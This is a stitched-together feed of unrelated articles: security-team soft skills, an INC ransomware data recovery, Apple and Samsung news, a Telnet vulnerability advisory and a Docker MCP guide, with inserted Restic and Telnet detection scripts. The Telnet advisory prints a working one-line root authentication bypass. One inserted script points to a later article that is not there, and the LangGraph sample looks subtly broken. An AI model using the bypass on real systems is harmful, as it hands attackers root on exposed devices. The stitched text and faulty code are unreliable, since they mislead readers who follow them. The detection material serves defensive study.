All of this requires leadership. More precisely, leadership without authority. The members of a high-performing team should be able to lead the IT security engineering team itself and to build and use influence outside the group. This can happen with other stakeholders or with internal customers of a service. Leading without authority brings the team closer to success. Strong relationships, organizational knowledge and context, and technical expertise should be brought together to influence others.
Soft skills for security engineers
The skills of a security engineer, and of the team as a whole, should go beyond communication and collaboration. In this context the term "soft skills" refers to the many non-technical skills that are more inwardly directed and complement the technical ones.
Time and priority management
Security engineers will always have plenty to do. Their technical skills mean requests to build, harden, patch or generally get involved in the software of an environment will arrive frequently. Time is a universal constraint for every team. For that reason both individuals and teams must become more effective at setting priorities. Being efficient while doing the wrong things makes no progress. There are many techniques for prioritizing work, weighing value against complexity, focusing on customer satisfaction or weighting different factors. Customer and compliance requirements are often the driving force behind the team's priorities. The method of prioritization matters less than ruthless adherence to the priorities and protection from the endless onslaught of requests that consume more valuable time.
Adaptability
Security engineering teams should be able to adapt to changing requirements, technologies and circumstances. Adaptability means more than prioritizing one task over another: what matters is adapting the approach to a problem based on the needs of those involved. IT security engineering teams must adapt to ownership as the team grows and stakeholder needs change, and to the deliberate inclusion of a diverse set of voices in the problem-solving process. The benefit for stakeholders and the entire IT security organization lies in agility and flexibility. An agile team is a more resilient team.
Continuous learning
A team that is able to constantly learn new skills, organizational context, policies and ways of working is indispensable in today's fast-moving world. Members of the security engineering team should therefore keep developing, renewing themselves and building on existing mental models and experience. This construct of mental models allows people to step into situations that share characteristics with something they have worked on before and to start contributing, exploring and doing.
Continuous learning can also affect the culture of an organization. Knowledge leads to sharing, sharing leads to discussion, and discussing new things sparks interest and conversation. This collective development of the mental models that permeate the company, and of how teams deal with and relate to IT security, advances the culture of collaboration.
Working in this highly specialized field does not mean a high-performing team can focus only on technology. People, the exploration of problems, building relationships and setting priorities are all essential components of a high-performing security engineering team. When building your team, take care to invest in and nurture these elements. (jm)
Further reading: Missing know-how, a threat to application security
This article is based on a piece from our US sister publication CSO Online.
View the full article
Twelve US companies hit by the INC ransomware group were able to recover encrypted data after a cybersecurity firm discovered the cloud storage infrastructure where the gang stockpiled what it stole.
Researchers at Florida-based Cyber Centaurs said Thursday they took advantage of a lapse in operational security by the gang: They found artifacts left behind by Restic, a legitimate open source backup utility the gang uses to encrypt and exfiltrate victim data into cloud storage environments it controls. Assuming the gang regularly re-uses Restic-based infrastructure led to finding an unnamed cloud storage provider where stolen data was dumped.
Unfortunately, Andrew von Ramin Mapp, Cyber Centaurs’ managing principal, admits that his firm’s work likely was no more than an “inconvenience” to the gang, because it can easily rent new cloud infrastructure.
But, he said, there are lessons for CSOs and infosec leaders from its efforts:
1. Scrutinize and audit your backups. If you have a regular backup schedule, is there unexpected or unexplained activity? Von Ramin Mapp notes that crooks are known to time data exfiltration to match corporate off-site backups as a way to hide their work.
2. Monitor for encrypted data leaving your environments and see where it goes. Does this data go to an unexpected IP address?
3. Make sure backup software and servers are updated as soon as patches are released. Crooks take advantage of unpatched software of any kind, including backup applications.
"Probably very few" infosec leaders realize that their own backup software is used against them, von Ramin Mapp said.
According to Trend Micro, the INC gang emerged in July 2023. A Linux version of its ransomware binary was seen five months later. A common tactic in its early years was to leverage vulnerabilities in Citrix Netscaler ADC and Netscaler Gateway, and researchers at Check Point Software also say the gang uses spear-phishing campaigns to capture user credentials. According to Cyber Centaurs, in smaller or flatter networks, INC operators often rely on Restic for data exfiltration prior to encryption; in larger or more complex environments, the gang favors using the backup infrastructure, such as Veeam, that’s already in place.
Cyber Centaurs was called in when a US customer’s endpoint detection and response software alerted it to an active ransomware execution on a production SQL Server. The process was quickly isolated, and it was found to be the RainINC variant.
Looking deeper, though, investigators found that multiple systems contained traces of Restic, which included renamed binaries, PowerShell scripts staging Restic execution to an S3-style cloud bucket infrastructure, repository configuration variables, and file-list driven backup commands.
While Restic wasn’t used for exfiltration in this particular attack, Cyber Centaurs suspected the gang regularly used it, based on patterns seen in other incidents. It also suspected the infrastructure the crooks used was unlikely to be dismantled even after negotiations ended or payments were made by corporate victims.
With that in mind, the incident response team developed a custom enumeration script to identify certain patterns that identify S3-style cloud bucket infrastructure that the stolen data might be going to. The script ran through a curated list of candidate repository identifiers derived from previously observed Restic artifacts. For each candidate, environment variables were set to match the configuration style used by the threat actor, including the repository endpoint and encryption password. Restic was then instructed to list available snapshots in a structured format, enabling investigators to analyze results without interacting with the underlying data.
The script explicitly avoided any operation that could alter a suspect repository or be interpreted as destructive. What the researchers did conduct was forensic enumeration, not intrusion, Cyber Centaurs stresses.
“The repositories were accessed using the attacker’s own tooling and configuration semantics, without exploitation, modification, or disruption,” its report says. “By treating the attacker’s infrastructure as evidentiary material rather than a target, investigators were able to safely validate the hypothesis of persistent, multi-victim storage, and lay the groundwork for what would become a rare and large-scale data recovery effort.”
What it discovered were stolen datasets belonging to 12 unnamed and unconnected firms hit in separate INC ransomware attacks. While the data was encrypted, Cyber Centaurs could use Restic for decryption because it was the encryption vehicle. Then it contacted law enforcement agencies to validate the stolen data’s source.
The report includes indicators of compromise and tools used by INC, including AnyDesk, a remote access application.
The report also notes that threat actors abusing Restic often rename the binary (for example, to winupdate.exe) and rely on legitimate execution paths to avoid suspicion. A simple and effective detection technique is to look for Restic execution outside expected backup contexts, especially from system directories or user-writable locations, and to pair that with known hashes where available.
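To make that detection advice concrete, here is an added example (not Cyber Centaurs' tooling and not from the report): Python that runs the check over constructed Sysmon-style process-creation events, tying an event to Restic by original file name, a known hash, or the Restic command-line shapes the report describes (repository variables, S3-style targets, file-list driven backups), then reporting executions from user-writable or system directories, staged through PowerShell, or launched by an unexpected parent. The approved install path, allowed parent process and SHA-256 are placeholder assumptions to be replaced with your own baseline.

```python
import re
from dataclasses import dataclass, field

# Assumed baseline (placeholders, not from the report): where the approved
# Restic binary is installed and which parent process may launch it.
EXPECTED_IMAGE = r"c:\program files\restic\restic.exe"
EXPECTED_PARENTS = {r"c:\windows\system32\svchost.exe"}  # scheduled-task host
# Placeholder: replace with the published SHA-256 of your approved Restic build.
KNOWN_RESTIC_SHA256 = {"placeholder-sha256-of-approved-restic-build"}

# Restic-specific command-line shapes: a subcommand paired with a repository
# target (-r / --repo / s3: URL), repository environment variables set by a
# staging script, or a file-list driven backup.
RESTIC_CMD_RE = re.compile(
    r"\b(backup|snapshots|restore|init|forget|prune)\b.*(\s-r\s|--repo\b|\bs3:)"
    r"|RESTIC_(REPOSITORY|PASSWORD)|--files-from\b",
    re.IGNORECASE | re.DOTALL,
)
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


@dataclass
class Finding:
    record_id: str
    image: str
    reasons: list = field(default_factory=list)


def restic_indicators(ev: dict) -> list:
    """Return the indicators tying this event to Restic (empty if none)."""
    hits = []
    if ev.get("OriginalFileName", "").lower() == "restic.exe":
        hits.append("original file name is restic.exe")
    if ev.get("SHA256", "").lower() in KNOWN_RESTIC_SHA256:
        hits.append("hash matches approved Restic binary")
    if RESTIC_CMD_RE.search(ev.get("CommandLine", "")):
        hits.append("command line uses Restic repository/backup syntax")
    return hits


def analyze_event(ev: dict):
    """Return a Finding if Restic runs outside the expected backup context."""
    indicators = restic_indicators(ev)
    if not indicators:
        return None
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    reasons = list(indicators)
    if image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        reasons.append("Restic staged through PowerShell")
    elif image != EXPECTED_IMAGE:
        if image.startswith(USER_WRITABLE):
            reasons.append("runs from user-writable location")
        elif image.startswith(SYSTEM_DIRS):
            reasons.append("runs from system directory")
        else:
            reasons.append("runs from unexpected path")
        if not image.endswith("\\restic.exe"):
            reasons.append("binary renamed")
    if parent not in EXPECTED_PARENTS:
        reasons.append("unexpected parent " + (parent or "<unknown>"))
    if len(reasons) == len(indicators):
        return None  # approved path and parent: the sanctioned backup job
    return Finding(str(ev.get("RecordId", "?")), image, reasons)


def scan(events: list) -> list:
    """Run the check over a list of process-creation events, in order."""
    return [f for f in map(analyze_event, events) if f is not None]


# Constructed sample events (Sysmon Event ID 1 fields), not real telemetry.
SAMPLE_EVENTS = [
    {"RecordId": 1, "Image": r"C:\Program Files\Restic\restic.exe",
     "OriginalFileName": "restic.exe",
     "SHA256": "placeholder-sha256-of-approved-restic-build",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"restic.exe backup --files-from C:\backup\filelist.txt -r s3:backup.example.invalid/corp"},
    {"RecordId": 2, "Image": r"C:\Windows\Temp\winupdate.exe",
     "OriginalFileName": "restic.exe", "SHA256": "deadbeef",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"winupdate.exe backup --files-from C:\ProgramData\f.txt -r s3:s3.example.invalid/bkt"},
    {"RecordId": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE", "SHA256": "cafebabe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -w hidden $env:RESTIC_REPOSITORY='s3:s3.example.invalid/bkt'; "
                    r"$env:RESTIC_PASSWORD='x'; & C:\Users\svc\AppData\Local\winupdate.exe backup C:\Finance"},
    {"RecordId": 4, "Image": r"C:\Windows\System32\notepad.exe",
     "OriginalFileName": "NOTEPAD.EXE", "SHA256": "feedface",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe notes.txt"},
    {"RecordId": 5, "Image": r"C:\Program Files\Restic\restic.exe",
     "OriginalFileName": "restic.exe",
     "SHA256": "placeholder-sha256-of-approved-restic-build",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "restic.exe snapshots --json -r s3:backup.example.invalid/corp"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.record_id, f.image, "; ".join(f.reasons))
```

Events 2, 3 and 5 are flagged (renamed binary in a temp directory, PowerShell staging with repository variables, and the approved binary launched by an unexpected parent), while the scheduled backup job in event 1 passes.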
Jon DiMaggio, head of XFIL Cyber and a specialist in ransomware attacks, said that what’s significant in this investigation isn’t just that stolen data from 12 companies was recovered, but that researchers exposed how ransomware groups reuse infrastructure across multiple victims. “Most ransomware incidents end once you contain the encryption and restore systems,” he said in an email. “This case shows the real value is in following the attacker’s operational patterns to find what they left behind. It’s a reminder that ransomware is a business model, not one-off attacks, and that means there are opportunities to disrupt it at scale.”
Defenders shouldn’t count on lapses like the one made by INC to rescue them from attacks, however. In its report, Cyber Centaurs says this was an opening “that would not normally exist in a typical ransomware response.” But, it adds, if there are mistakes, defenders may be able to capitalize on them.
In an interview, von Ramin Mapp cautioned that lowering the risk of being hit by ransomware isn’t easy. Attackers will respond to every tactic defenders use, he said. It will help, he noted, if victim firms refuse to pay ransoms and thus take away the financial reward the gangs depend on.
“One thing I often recommend to organizations,” he added, “is to have a baseline of the read and write output on your servers and network shares. If ransomware is being deployed, you will see a drastic increase in these cycles.”
Popular password management app 1Password today announced the launch of a new phishing protection feature that's meant to "act as a second pair of eyes" before users provide their passwords to scammers.


1Password will not autofill a username and password on a website that is spoofing another as one layer of protection, but users can get around that by manually retrieving their usernames and passwords.

To add further protection, when a user attempts to paste their username and password into a website, the 1Password browser extension will display a pop-up warning that prompts them to pause and use caution before continuing. 1Password hopes that the warning will cause users to take a second, more careful look at the website before proceeding.

The phishing protection feature will be turned on by default for individual and family plan users, while 1Password Admins can turn it on for employees. The protection is rolling out starting today.

Pricing for 1Password starts at $2.99 per month for an individual user.

Tag: 1Password
This article, "1Password Launches Anti-Phishing Warnings for Pasted Passwords" first appeared on MacRumors.com
Apple claims the European Commission is refusing to let to implement App Store changes, instead using "political delay tactics" to levy unfair investigations and fines. Apple provided the statement to Bloomberg in response to MacPaw's decision to shut down alternative iOS app marketplace Setapp Mobile in the EU because of the complicated business terms that it has to deal with.



MacPaw plans to sunset Setapp Mobile in the EU on February 16, 2026. The company said it was shutting down the app because of "complex business terms that don't fit Setapp's current business model," but MacPaw did not go into further detail. Apple does indeed have a complicated fee structure in Europe, for both app marketplaces and the apps that are distributed through them. Apple allows for app marketplaces in the EU because of the Digital Markets Act, which is policed by the European Commission.

The European Commission is gearing up to blame Apple for Setapp's EU shutdown, according to information viewed by Bloomberg. "Apple has not rolled out changes to address the key issues concerning its business terms, including their complexity," the EC reportedly plans to say.

Apple says that it has not simplified its EU business terms as expected because of the European Commission's refusal to let it implement the changes.

Apple further claims that there is little demand for alternative app marketplaces in Europe, and the company said that it is not the reason that Setapp is shutting down.

Tags: European Commission, European Union
This article, "Apple Accuses European Commission of 'Political Delay Tactics' Over App Store Changes" first appeared on MacRumors.com
A major storm system is expected to deliver significant snowfall and freezing rain across more than half of the United States this weekend, with winter weather alerts in effect in cities like Atlanta, Baltimore, Boston, Charlotte, Cleveland, Dallas, Indianapolis, Nashville, New York, Philadelphia, Raleigh, Washington D.C., and others.


On the iPhone, iPad, and Mac, the Apple Weather app has forecasted up to two feet of snowfall in some cities, which has led to a lot of discussion on social media platforms like Reddit. However, as The New York Times noted, meteorologists caution that it can be difficult to forecast specific precipitation amounts several days in advance of a storm.

As the low-pressure system approaches, and its path becomes more clear, snowfall amounts shown in the Apple Weather app have decreased in many cities compared to what was originally forecasted. In some areas, there may only be freezing rain and sleet. By all accounts, though, the storm is shaping up to be a significant event.

What is behind the Apple Weather app's forecasts?

In 2020, Apple acquired the popular weather app Dark Sky, and it has since integrated the app's features and hyperlocal forecasts into the Apple Weather app. In a support document, however, Apple says that it still gathers at least some weather data from sources including the U.S. National Weather Service, The Weather Channel, and others.

In the U.S., you can receive severe weather and next-hour precipitation notifications on your iPhone by opening the Apple Weather app, tapping on the list icon in the bottom-right corner, tapping on the three dots in the top-right corner, selecting Notifications, and turning on both types of notifications under Current Location.

Tag: Apple Weather
This article, "Why is the Apple Weather App on the iPhone Predicting So Much Snow?" first appeared on MacRumors.com
Computers with Telnet open are in immediate danger of being compromised due to a critical vulnerability that allows attackers to bypass authentication.
The Telnet remote access protocol has long been superseded by the more secure and encrypted SSH, but many IoT and embedded devices have continued to ship with Telnet exposed on the LAN interface for debugging purposes over the years.
Making things worse, the vulnerability, now tracked as CVE-2026-24061, is trivial to exploit remotely, and because it has existed in the codebase for the past 11 years since version 1.9.3, it likely impacts many devices that are no longer supported and will not receive firmware updates.
Trivial exploitation
“The telnetd server invokes /usr/bin/login (normally running as root) passing the value of the USER environment variable received from the client as the last parameter,” Simon Josefsson, a GNU contributor who submitted the patch, said on the OSS-SEC mailing list. “If the client supplies a carefully crafted USER environment value being the string '-f root', and passes the telnet(1) -a or --login parameter to send this USER environment to the server, the client will be automatically logged in as root bypassing normal authentication processes.”
In other words, the exploit is achieved with the simple command: USER='-f root' telnet -a [host_ip]. This not only works against remote systems, but it can also serve as a privilege escalation exploit on the local machine if the telnet service (telnetd) is running.
Telnet is part of inetutils, the GNU network utilities package shipped with all Linux and other UNIX-based systems. Users are advised to deploy the patch as soon as possible or update to a patched version offered by their distribution. As a temporary mitigation, users are advised to either disable the telnet service entirely or filter access to it to only allow white-listed IP addresses.
Scan enterprise networks
The Telnet server should never be exposed to the internet in this day and age, but misconfigured servers and IoT devices that have it enabled continue to exist. These will be easily compromised by IoT worms and botnet malware. Malicious traffic monitoring service GreyNoise is already seeing attempts to exploit this vulnerability.
It’s more common to find Telnet exposed inside local networks, despite the fact that, given that it’s an obsolete program, it shouldn’t be used at all. Organizations should scan their networks and immediately isolate and firewall Telnet-enabled devices because all it takes is a malware infection on any other computer on the network for attackers to have an opportunity to exploit them. Executing this attack doesn’t require any special privileges, as low-privileged users can typically initiate telnet connections.
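The option exchange the advisory describes (the client sending USER through Telnet's NEW-ENVIRON option) is something a network sensor on TCP/23 can recognise directly. Below is an added example, not from the advisory or from the inetutils project, that decodes NEW-ENVIRON subnegotiations per RFC 1572 and flags a USER value that login(1) would parse as an option; it also serves the second CVE-2026-24061 item further down this page. It assumes you already have the captured client-to-server bytes; the two streams at the bottom are constructed.

```python
"""Detect the CVE-2026-24061 pattern in captured Telnet client traffic.

Added example, not from the advisory or from inetutils: it decodes the
NEW-ENVIRON option (RFC 1572) and flags a USER value that login(1) would
parse as an option. The byte streams at the bottom are constructed.
"""
from typing import List, Optional

IAC, SB, SE, WILL = 255, 250, 240, 251   # Telnet command bytes
NEW_ENVIRON = 39                          # option code
IS, SEND, INFO = 0, 1, 2                  # NEW-ENVIRON subcommands
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3     # NEW-ENVIRON field types


def extract_subnegotiations(data: bytes) -> List[bytes]:
    """Return the payload of every IAC SB ... IAC SE block (IAC IAC unescaped)."""
    blocks, i, n = [], 0, len(data)
    while i < n:
        if data[i] != IAC or i + 1 >= n or data[i + 1] != SB:
            i += 1
            continue
        j, payload = i + 2, bytearray()
        while j < n:
            if data[j] == IAC and j + 1 < n:
                if data[j + 1] == SE:
                    break
                if data[j + 1] == IAC:      # escaped 0xFF inside the subnegotiation
                    payload.append(IAC)
                    j += 2
                    continue
            payload.append(data[j])
            j += 1
        else:
            break                           # truncated block: stop parsing
        blocks.append(bytes(payload))
        i = j + 2
    return blocks


def parse_new_environ(payload: bytes) -> Optional[dict]:
    """Decode a NEW-ENVIRON IS/INFO payload into {name: value}; None if it is another option."""
    if len(payload) < 2 or payload[0] != NEW_ENVIRON or payload[1] not in (IS, INFO):
        return None
    fields, kind, buf, i = [], None, bytearray(), 2
    while i < len(payload):
        b = payload[i]
        if b == ESC and i + 1 < len(payload):    # ESC quotes the next byte
            buf.append(payload[i + 1])
            i += 2
            continue
        if b in (VAR, USERVAR, VALUE):
            if kind is not None:
                fields.append((kind, buf.decode("latin-1")))
            kind, buf = b, bytearray()
        else:
            buf.append(b)
        i += 1
    if kind is not None:
        fields.append((kind, buf.decode("latin-1")))
    env, name = {}, None
    for kind, text in fields:
        if kind in (VAR, USERVAR):
            name = text
            env[name] = ""                       # a variable may be sent without a value
        elif name is not None:
            env[name] = text
            name = None
    return env


def flag_user_injection(client_bytes: bytes) -> List[str]:
    """Return every USER value that starts with '-', i.e. one login(1) would treat as an option."""
    hits = []
    for payload in extract_subnegotiations(client_bytes):
        env = parse_new_environ(payload)
        if env and env.get("USER", "").lstrip().startswith("-"):
            hits.append(env["USER"])
    return hits


# Constructed sample client->server streams: IAC WILL NEW-ENVIRON, then an IS block.
BENIGN_STREAM = b"\xff\xfb\x27\xff\xfa\x27\x00\x00USER\x01alice\x03DISPLAY\x01host:0\xff\xf0"
ATTACK_STREAM = b"\xff\xfb\x27\xff\xfa\x27\x00\x00USER\x01-f root\xff\xf0"

if __name__ == "__main__":
    print("benign:", flag_user_injection(BENIGN_STREAM))   # []
    print("attack:", flag_user_injection(ATTACK_STREAM))   # ['-f root']
```

Any USER value beginning with "-" is a reliable alert here, because a legitimate login name never starts with an option character; the rest of the environment (DISPLAY and friends) is decoded so the same parser can feed an inventory of which devices still speak Telnet.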
Samsung recently kicked off a sale across its most popular Vision AI-supported monitors and TVs, with notable markdowns on products like The Frame and the Smart Monitor series. These deals have all been applied automatically on Samsung's website, and many match all-time low prices on these products.

Note: MacRumors is an affiliate partner with Samsung. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

Starting with monitors, you can get the 32-inch Smart Monitor M9 4K OLED for $1,299.99, down from $1,599.99. This version of the Smart Monitor line launched last summer, and Samsung's discount today is a match of the record low price on the display.


Another notable monitor discount is the 43-inch Smart Monitor M7 in White for $359.99, down from $499.99. You'll also find the 32-inch Smart Monitor M8 for $399.99, down from $699.99.


Regarding TVs, there are quite a few models of The Frame TV on sale, including all-time low prices on The Frame models from 2025. You can get the 2025 65-inch The Frame TV for $1,199.99 ($600 off), as well as the 75-inch Frame Pro for $1,999.99 ($1,200 off), a match of the all-time low price.


For even more savings, anyone interested can watch Samsung's Super Bowl-themed Vision AI commercial to stack on an extra 10 percent off at checkout. The video is under 1 minute long, so it's worth it if you're shopping for one of Samsung's high-end TVs or monitors this month.

TVs

55-inch QLED QEF1 Smart TV - $349.99, down from $599.99
55-inch QLED Q7F Smart TV - $399.99, down from $529.99
55-inch QLED Q8F Smart TV - $699.99, down from $749.99
75-inch Vision AI Smart TV - $599.99, down from $1,199.99
50-inch The Frame - $799.99, down from $1,099.99
75-inch Neo QLED QN70F Smart TV - $1,199.99, down from $1,599.99
65-inch The Frame - $1,199.99, down from $1,799.99
55-inch OLED S95F Smart TV - $1,899.99, down from $2,299.99
75-inch The Frame Pro - $1,999.99, down from $3,199.99
85-inch The Frame Pro - $3,299.99, down from $4,299.99
85-inch Neo QLED QN90F Smart TV - $2,299.99, down from $4,499.99
Monitors

32-inch ViewFinity S70A UHD Monitor - $299.99, down from $459.99
43-inch Smart Monitor M7 - $359.99, down from $499.99
32-inch Smart Monitor M8 - $399.99, down from $699.99
27-inch Odyssey OLED G6 Gaming Monitor - $749.99, down from $999.99
49-inch Odyssey OLED G9 Gaming Monitor - $849.99, down from $1,299.99
32-inch Smart Monitor M9 - $1,299.99, down from $1,599.99
Galaxy Products

Galaxy XR - Save up to $1,140 with the Explorer Pack
Galaxy S25 Ultra - Save up to $700 in instant trade-in credit
Galaxy Ring - Get up to $150 trade-in credit
Galaxy Watch Ultra - Save up to $250
Galaxy Watch 8 - Save up to $200

If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.
This article, "Get Super Bowl Ready With Samsung's Big Sale on TVs and Monitors" first appeared on MacRumors.com
Popular Apple racing movie F1 has been nominated for Best Picture by the Academy of Motion Picture Arts and Sciences, Apple said today. Nominees were announced for the 98th annual Academy Awards, and Apple earned six nominations in total.


F1, which stars Brad Pitt, will be up against Bugonia, Frankenstein, Hamnet, Marty Supreme, One Battle After Another, Sinners, Sentimental Value, The Secret Agent, and Train Dreams for the Best Picture Award. The film was also nominated for Best Sound, Best Film Editing, and Best Visual Effects.

Apple documentary Come See Me in the Good Light was nominated for Best Documentary Feature Film, and The Lost Bus was nominated for Best Visual Effects.

F1 was the highest-grossing sports feature of all time, according to Apple, and one of the company's most successful films to date. It earned over $631 million worldwide during its theatrical run. Apple says that its films, documentaries, and shows have earned 687 total wins and 3,229 award nominations since the Apple TV service launched in 2019.

The 98th annual Academy Award winners will be revealed on Sunday, March 15.

Tag: Apple TV Plus
This article, "Apple's F1 Movie Nominated for Best Picture at 2026 Oscars" first appeared on MacRumors.com
Model Context Protocol (MCP) servers are a spec for exposing tools, models, or services to language models through a common interface. Think of them as smart adapters: they sit between a tool and the LLM, speaking a predictable protocol that lets the model interact with things like APIs, databases, and agents without needing to know implementation details.
But like most good ideas, the devil’s in the details.
The Promise—and the Problems of Running MCP Servers
Running an MCP sounds simple: spin up a Python or Node server that exposes your tool. Done, right? Not quite.
You run into problems fast:
Runtime friction: If an MCP is written in Python, your environment needs Python (plus dependencies, plus maybe a virtualenv strategy, plus maybe GPU drivers). Same goes for Node. This multiplies fast when you’re managing many MCPs or deploying them across teams.

Secrets management: MCPs often need credentials (API keys, tokens, etc.). You need a secure way to store and inject those secrets into your MCP runtime. That gets tricky when different teams, tools, or clouds are involved.

N×N integration pain: Let’s say you’ve got three clients that want to consume MCPs, and five MCPs to serve up. Now you’re looking at 15 individual integrations. No thanks.

To make MCPs practical, you need to solve these three core problems: runtime complexity, secret injection, and client-to-server wiring.
If you’re wondering where I’m going with all this, take a look at those problems. We already have a technology that has been used by developers for over a decade that helps solve them: Docker containers.
In the rest of this blog I’ll walk through three different approaches, going from least complex to most complex, for integrating MCP servers into your developer experience. 
Option 1 — Docker MCP Toolkit & Catalog
For the developer who already uses containers and wants a low-friction way to start with MCP.
If you’re already comfortable with Docker but just getting your feet wet with MCP, this is the sweet spot. In the raw MCP world, you’d clone Python/Node servers, manage runtimes, inject secrets yourself, and hand-wire connections to every client. That’s exactly the pain Docker’s MCP ecosystem set out to solve.
Docker’s MCP Catalog is a curated, containerized registry of MCP servers. Each entry is a prebuilt container with everything you need to run the MCP server. 
The MCP Toolkit (available via Docker Desktop) is your control panel: search the catalog, launch servers with secure defaults, and connect them to clients.
How it helps:
No language runtimes to install
Built-in secrets management
One-click enablement via Docker Desktop
Easily wire the MCPs to your existing agents (Claude Desktop, Copilot in VS Code, etc.)
Centralized access via the MCP Gateway

Figure 1: Docker MCP Catalog: Browse hundreds of MCP servers with filters for local or remote and clear distinctions between official and community servers
A Note on the MCP Gateway
One important piece working behind the scenes in both the MCP Toolkit and cagent (a framework for easily building multi-agent applications that we cover below) is the MCP Gateway, an open-source project from Docker that acts as a centralized frontend for all your MCP servers. Whether you’re using a GUI to start containers or defining agents in YAML, the Gateway handles all the routing, authentication, and translation between clients and tools. It also exposes a single endpoint that custom apps or agent frameworks can call directly, making it a clean bridge between GUI-based workflows and programmatic agent development.
Moving on: Using MCP servers alongside existing AI agents is often the first step for many developers. You wire up a couple of tools, maybe connect to a calendar or a search API, and use them in something like Claude, ChatGPT, or a small custom agent. For step-by-step tutorials on how to automate dev workflows with Docker’s MCP Catalog and Toolkit with popular clients, check out these guides on ChatGPT, Claude Desktop, Codex, Gemini CLI, and Claude Code.
Once that pattern clicks, the next logical step is to use those same MCP servers as tools inside a multi-agent system.
Option 2 — cagent: Declarative Multi-Agent Apps
For the developer who wants to build custom multi-agent applications but isn’t steeped in traditional agentic frameworks.
If you’re past simple MCP servers and want agents that can delegate, coordinate, and reason together, cagent is your next step. It’s Docker’s open-source, YAML-first framework for defining and running multi-agent systems—without needing to dive into complex agent SDKs or LLM loop logic.
Cagent lets you describe:
The agents themselves (model, role, instructions)
Who delegates to whom
What tools each agent can access (via MCP or local capabilities)

Below is an example of a pirate-flavored chat bot:

```yaml
agents:
  root:
    description: An agent that talks like a pirate
    instruction: Always answer by talking like a pirate.
    welcome_message: |
      Ahoy! I be yer pirate guide, ready to set sail on the seas o' knowledge! What be yer quest?
    model: auto
```

Run it with:

```shell
cagent run agents.yaml
```

You don’t write orchestration code. You describe what you want, and Cagent runs the system.

Why it works:
Tools are scoped per agent
Delegation is explicit
Uses MCP Gateway behind the scenes
Ideal for building agent systems without writing Python

If you’d like to give cagent a try, we have a ton of examples in the project’s GitHub repository. Check out this guide on building multi-agent systems in 5 minutes.
Option 3 — Traditional Agent Frameworks (LangGraph, CrewAI, ADK)
For developers building complex, custom, fully programmatic agent systems.

Traditional agent frameworks like LangGraph, CrewAI, or Google’s Agent Development Kit (ADK) let you define, control, and orchestrate agent behavior directly in code. You get full control over logic, state, memory, tools, and workflows.
They shine when you need:
Complex branching logic
Error recovery, retries, and persistence
Custom memory or storage layers
Tight integration with existing backend code

Example: LangGraph + MCP via Gateway

```python
import requests
from langgraph.graph import StateGraph
from langchain.agents import Tool
from langchain_openai import ChatOpenAI

# Discover MCP endpoint from Gateway
resp = requests.get("http://localhost:6600/v1/servers")
servers = resp.json()["servers"]
duck_url = next(s["url"] for s in servers if s["name"] == "duckduckgo")

# Define a callable tool
def mcp_search(query: str) -> str:
    return requests.post(duck_url, json={"input": query}).json()["output"]

search_tool = Tool(name="web_search", func=mcp_search, description="Search via MCP")

# Wire it into a LangGraph loop
llm = ChatOpenAI(model="gpt-4")
graph = StateGraph()
graph.add_node("agent", llm.bind_tools([search_tool]))
graph.add_edge("agent", "agent")
graph.set_entry_point("agent")
app = graph.compile()
app.invoke("What's the latest in EU AI regulation?")
```

In this setup, you decide which tools are available. The agent chooses when to use them based on context, but you’ve defined the menu.
And yes, this is still true in the Docker MCP Toolkit: you decide what to enable. The LLM can’t call what you haven’t made visible.

Choosing the Right Approach
| Approach | Best For | You Manage | You Get |
| --- | --- | --- | --- |
| Docker MCP Toolkit + Catalog | Devs new to MCP, already using containers | Tool selection | One-click setup, built-in secrets, Gateway integration |
| Cagent | YAML-based multi-agent apps without custom code | Roles & tool access | Declarative orchestration, multi-agent workflows |
| LangGraph / CrewAI / ADK | Complex, production-grade agent systems | Full orchestration | Max control over logic, memory, tools, and flow |
Wrapping Up
Whether you’re just connecting a tool to Claude, designing a custom multi-agent system, or building production workflows by hand, Docker’s MCP tooling helps you get started easily and securely. 
Check out the Docker MCP Toolkit, cagent, and MCP Gateway for example code, docs, and more ways to get started.
Apple's hardware chief John Ternus has been overseeing Apple design teams since late last year as Apple continues preparing him to take over as CEO, reports Bloomberg.


Apple CEO Tim Cook put Ternus in charge of the design teams the final months of 2025, expanding his responsibilities. Apple's software and hardware design teams were most recently managed by former Apple chief operating officer Jeff Williams, who retired from Apple in 2025. When Williams retired, Apple said the design teams would report directly to Cook, but Cook apparently handed the reins to Ternus.

Design is one of the most important divisions at Apple, and it has always been led by a senior executive. Jony Ive was in charge of the design team before he left and it was given to Williams.

Ternus is apparently the "executive sponsor" of all design on Cook's management team, which means he handles communications between design staff and the executive team. He represents the design team in executive gatherings, and manages design team leaders.

Bloomberg claims that inside sources said Cook is aiming to expose Ternus to more parts of the company's operations. Design decisions are made by consensus, so while Ternus is taking on a larger role, software engineering chief Craig Federighi and marketing chief Greg Joswiak continue to have a say in Apple's overall aesthetic.

Multiple reports have suggested that Ternus is the most likely candidate to take on the role of Apple CEO when Cook retires. Cook turned 65 last year, but there do not appear to be any imminent plans for his retirement. Ternus is Apple's youngest senior executive at 50, so he could have a long run if he is eventually promoted to CEO.

Ternus leads Apple's hardware engineering team, and he has been described as having an even temperament, strong attention to detail, and intimate knowledge of Apple's supply chain. Some at Apple fear that he is too risk averse, inexperienced with geopolitical issues, and not charismatic enough to run Apple.

Tag: John Ternus
This article, "Apple's John Ternus Takes Over Design in Latest CEO Succession Move" first appeared on MacRumors.com
